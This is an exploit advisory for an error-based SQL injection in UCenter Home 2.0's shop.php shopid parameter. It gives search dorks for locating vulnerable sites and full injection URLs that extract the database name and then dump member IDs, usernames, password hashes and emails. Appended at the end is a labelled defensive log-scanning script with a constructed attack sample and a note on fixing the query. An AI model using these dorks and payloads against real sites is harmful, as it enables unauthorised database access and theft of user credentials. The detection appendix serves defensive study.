__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
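
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Detection example (added here, not part of the original advisory and not UCenter Home code): a log check that flags shop.php requests whose shopid is not a plain integer, and marks those carrying fragments of the error-based pattern shown above. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Fragments of the MySQL error-based pattern shown in the advisory.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema",
    r"group\s+by", r"concat\s*\(")]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def classify_target(target):
    """Return 'ok', 'non_numeric' or 'error_based_sqli' for a request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("shop.php"):
        return "ok"
    verdict = "ok"
    for value in parse_qs(parts.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue                      # a plain integer id is expected
        verdict = "non_numeric"
        decoded = unquote_plus(value)     # second pass catches double encoding
        if sum(bool(m.search(decoded)) for m in MARKERS) >= 2:
            return "error_based_sqli"
    return verdict

def scan_log(lines):
    """Return (line_number, verdict) for every suspicious shop.php request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            verdict = classify_target(match.group(1))
            if verdict != "ok":
                hits.append((number, verdict))
    return hits

# Constructed sample access-log lines (documentation IP ranges, shortened query).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2010:13:55:36 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2010:13:56:02 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [10/Oct/2010:13:56:40 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '198.51.100.4 - - [10/Oct/2010:13:57:10 +0000] "GET /index.php?q=group+by HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, verdict in scan_log(SAMPLE_LOG):
        print(number, verdict)
```

Any non_numeric hit is worth review on its own, since shopid is only ever an integer id in legitimate requests; the same observation is the fix on the server side, where the value should be cast to an integer or bound as a query parameter before it reaches MySQL.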